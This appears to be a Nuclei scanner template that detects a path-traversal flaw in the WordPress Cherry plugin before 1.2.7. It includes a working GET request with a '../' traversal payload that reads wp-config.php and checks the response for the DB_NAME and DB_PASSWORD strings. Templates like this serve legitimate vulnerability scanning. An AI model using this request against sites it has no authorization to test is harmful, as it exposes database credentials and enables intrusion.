id: cherry-file-download

info:
  name: Cherry Plugin < 1.2.7 - Arbitrary File Retrieval and File Upload
  author: 0x_Akoko
  severity: high
  description: WordPress plugin Cherry < 1.2.7 contains an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
  reference:
    - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
    - https://github.com/CherryFramework/cherry-plugin
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: wordpress,wp-plugin,lfi,wpscan

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100df45d091bfbfb23ac387808e492887d1e9338879a588fd78b4ce8b13b706832c02203d8c9e3e168239a4753999bf5fc110f660103b34e76081df15cd4aef82adf4ee:922c64590222798bb761d5b6d8e72950